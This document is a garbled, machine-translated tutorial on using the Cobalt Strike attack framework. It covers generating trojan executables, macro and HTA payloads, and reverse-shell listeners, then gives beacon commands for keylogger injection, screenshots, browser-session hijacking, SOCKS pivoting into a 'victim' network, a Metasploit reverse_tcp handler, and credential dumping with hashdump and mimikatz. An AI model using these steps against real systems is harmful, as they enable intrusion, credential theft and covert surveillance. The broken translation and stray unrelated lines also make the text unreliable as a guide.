Introduction to Cobalt Strike
english text to speech voices
Cobalt Strike a metasploit-based GUI of the framework of penetration testing tools, integrated port forwarding, service scanning, automation overflow, multi-mode port monitoring, win exe Trojan generation, win dll Trojan generation, java Trojan generation, office macro virus Generation, Trojans tied; phishing attacks include: site cloning, target information access, java implementation, the browser automatically attack and so on. The Cobalt Strike 3.0 is no longer using the Metasploit framework as a standalone platform, and can be used in conjunction with Armitage.
Cobalt Strike Usage
1. Execute the command on the community server to run the server:
./teamserver 10.0.0.88 backlion // The server IP address is 10.0.0.88 and the password is backlion
2. Execute on customer service (can be connected):
On windows
Java -XX: + AggressiveHeap -XX: + UseParallelGC -jar cobaltstrike.jar $
On Linux:
./cobaltstrike
Hostname: 10.0.0.88 port: 50050 user name: any password: backlion
3. Create a local monitor listen:
Cobalt Strike-> Listeners, and then click Add to create your own Listeners, Cobalt Strike3.6 include
· windows/beacon_dns/reverse_dns_txt
· windows/beacon_dns/reverse_http
· windows/beacon_http/reverse_http
· windows/beacon_https/reverse_https
· windows/beacon_smb/bind_pipe
· windows/foreign/reverse_dns_txt
· windows/foreign/reverse_http
· windows/foreign/reverse_https
· windows/foreign/reverse_tcp
On windows/beacon * is Cobalt Strike comes with the module, including dns, http, https, smb four kinds of listeners, windows/foreign * for the external listener, that is, msf or Armitage listener. Select the listener after the host will automatically fill in the service when we open the ip, configure the listening port, and then save the listener.
4. Attack module introduction
Create a good listener, the following need to configure the client, Cobalt Strike includes a variety of attacks, including Packages include the following:
HTML Application generates malicious HTA Trojan files;
MS Office Macro generates office macro virus files;
Payload Generator generates payload for various language versions;
USB / CD AutoPlay Generates Trojan files that run with autoplay;
Windows Dropper bundles, able to bundle the document class;
Windows Executable generates executable exe Trojans;
Windows Executable (S) generates a stateless executable exe Trojan.
Web Drive-by includes the following modules:
Manage Manage open web services
Clone Site cloning site that can record the data submitted by the victim;
Host File provides a file download, you can modify the Mime information;
Scripted Web Delivery is similar to web_delivery msf;
Signed Applet Attack uses a java self-signed program for phishing attacks;
Smart Applet Attack automatically detects java version and attack, for Java 1.6.0_45 and Java 1.7.0_21;
System Profiler is used to get some system information, such as system version, Flash version, browser version and so on.
Spear Phish is a module for mailing.
5.View display module introduction
View module can facilitate the test to see the various modules, graphical interface can easily see the victims of the machine’s various information.
Applications show the application information of the victim machine;
Credentials shows the victim machine’s certificate information , can be more convenient for subsequent infiltration ;
Download Download the file
Event Log can see the event log, clearly see the system events, and the team can chat here;
Keystrokes View keyloggers ;
Proxy Pivots View proxy information ;
Screenshots screenshots function ;
[adsense size='1' ]
Script Console where you can load a variety of enhancements to the script, the script address is cortana-script ;
Targets to see the target;
Web Log View web log.
6. Reporting the introduction of the report module
Activity report activity report generation
Hosts report host report
Indicators of Compromise target report
Sessions report Session report
Social Engineering Report
7.Beacon module used
7.0 Generate an exe backdoor
Attacks – packages – windows executable, can generate a windows exe back door, as shown below:
7.1 The generated backdoor artifact.exe is uploaded to the victim host to execute
In the Cobalt Strike will rebound in the target victim host shell, and then click on the victim’s machine in the
7.2 Click on the victim to rebound in the host of the interaction, and then you can enter into the beacon
7.3 shell command for beacon module **
Beacon> help shell
Beacon> shell ifconfig
Beacon> shell whoami
Beacon> shell net user
7.4 beacon browserpivot command
The user into the victim browser process, and then open the HTTP proxy, then you can log on the victims of the site
Beacon> ps // view the browser process, where the process is 2396
Beacon> browserpivot 2396 / / into the process, and open the http proxy, the proxy server: 10.0.0.88:62243
The local browser sets the http proxy, host: 10.0.0.88 The proxy type is: http port: 62243
Beacon> browserpivot stop // stop the agent
7.5 beacon module Socks command
Select the victim host, and then right Pivoting-> SOCKS Server, then use this computer to open socks proxy
Configure the proxychains configuration file under kali:
vim /etc/proxychains.conf
Change socks4 127.0.0.1 9050 to: socks4 127.0.0.1 26370
Proxychains firefox ESR // can access broiler intranet via sokcsk5 agent
Beacon> socks stop // close the scoks proxy
7.6 beacon module of the Screenshot & Keylogger
[adsense size='1' ]
Beacon> screenshot // Run the screenshots command
And then open View-> Screenshots, you can see the screenshot
Beacon> ps / / view the system process, casually choose a process PID process
Beacon> keylogger 2640 // keyboard record injection process
Open View-> Keystrokes, you can see the keyboard record results
7.7 beacon module powershell-import command
Beacon> powershell-import // Import various powershell scripts, where you can import the nishang module
Beacon> powershell posershell_script_name
or
Beacon> powershell Check-VM
7.8 Cobalt Strike and msf linkage
1. Execute the following command under MSF:
msf> use exploit / multi / handler
msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
msf exploit (handler)> set lhost 192.168.1.100
msf exploit (handler)> set lport 4444
msf exploit (handler)> exploit
[adsense size='1' ]
2. In the implementation of the Cobalt Strike, first add a monitor command, the name is: msf payload Select: windows/foreign/reverse_tcp listening port: 4444
3. Select the victim host, then right-click Spawn
4. In msf can be a rebound under the meterpreter session:
7.9 beacon password module
Beacon> sleep 0 // show the results quickly
Beacon> wdigest // read the information
Beacon> hashdump // read account hash password value, need to know permissions, right click victim host –access-hashdump
Beacon> logonpasswords // run mimikatz, right click victim host – illustrated RUN mimikatz
Cobalt Strike Summary
Cobalt Strike features exceptionally powerful, and MSF graphical interface, more intuitive operation, more convenient for automated attacks, you have to help in the penetration test
Gloss